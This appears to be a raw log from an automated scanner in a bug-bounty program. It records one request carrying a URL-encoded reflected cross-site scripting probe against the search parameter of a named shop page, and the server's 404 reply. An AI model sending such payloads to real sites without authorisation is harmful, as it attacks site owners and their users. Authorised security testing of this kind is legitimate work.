[ep-web-cms-xss] Dumped HTTP request for https://techsolutions.bitpanda.com/shop.php?search=%22/%3E%3Cscript%3Ealert(document.domain)%3C/script%3E


GET /shop.php?search=%22/%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: techsolutions.bitpanda.com
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip


[ep-web-cms-xss] Dumped HTTP response https://techsolutions.bitpanda.com/shop.php?search=%22/%3E%3Cscript%3Ealert(document.domain)%3C/script%3E

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 9
Cache-Control: max-age=30
Content-Type: text/plain
Date: Tue, 05 Aug 2025 12:53:24 GMT
Strict-Transport-Security: max-age=31536000
Via: 1.1 018bc8ac3ac3155b3d0b36b861811052.cloudfront.net (CloudFront)
X-Amz-Cf-Id: WiAJ68rKhfYVo9bXtwRXbHlADFUwTRUuSG-yu-hwqKXRRoyFilLEJg==
X-Amz-Cf-Pop: IAD55-P8
X-Amz-Id-2: uR4eAMICTMUdZdHVTRtAfTi4guX7wCrhxquuCnD56F+eqIRkKAPKDZ28RYBpiA0F4t9WvjToscE=
X-Amz-Request-Id: 74N2MVV28BDDJT1S
X-Cache: Error from cloudfront

Not Found
